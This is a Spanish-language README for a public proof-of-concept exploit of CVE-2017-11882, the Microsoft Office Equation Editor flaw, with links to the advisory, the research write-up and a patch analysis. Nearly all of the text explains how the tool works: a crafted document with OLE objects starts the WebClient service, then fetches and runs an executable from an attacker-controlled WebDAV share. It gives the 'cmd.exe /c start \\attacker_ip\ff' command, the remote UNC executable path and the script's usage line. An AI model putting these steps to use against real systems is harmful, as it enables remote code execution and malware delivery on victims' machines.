
Exploits de prueba de concepto para CVE-2017-11882
CVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882
MITRE CVE-2017-11882: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882
Investigación: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about
Análisis del parche: https://0patch.blogspot.ru/2017/11/did-microsoft-just-manually-patch-their.html
DEMO PoC de explotación: https://www.youtube.com/watch?v=LNFG0lktXQI&lc=z23qixrixtveyb2be04t1aokgz10ymfjvfkfx1coc3qhrk0h00410
Un PoC simple para CVE-2017-11882. Este exploit hace que el servicio WebClient se inicie y ejecute un archivo remoto desde un servidor WebDav controlado por el atacante. La razón por la que este enfoque puede ser útil es una limitación en la longitud del comando ejecutado. Sin embargo, con la ayuda de WebDav es posible lanzar un ejecutable arbitrario controlado por el atacante en la máquina vulnerable. Este script crea un documento simple con varios objetos OLE. Estos objetos explotan CVE-2017-11882, lo que resulta en la ejecución secuencial de comandos.
El primer comando que hace que se inicie el servicio WebClient puede verse así:
cmd.exe /c start \\attacker_ip\ff
La ruta del binario controlado por el atacante debe ser una ruta de red UNC:
\\attacker_ip\ff\1.exe
webdav_exec_CVE-2017-11882.py -u trigger_unc_path -e executable_unc_path -o output_file_name
La carpeta example contiene un archivo .rtf que explota la vulnerabilidad CVE-2017-11882 y ejecuta la calculadora en el sistema.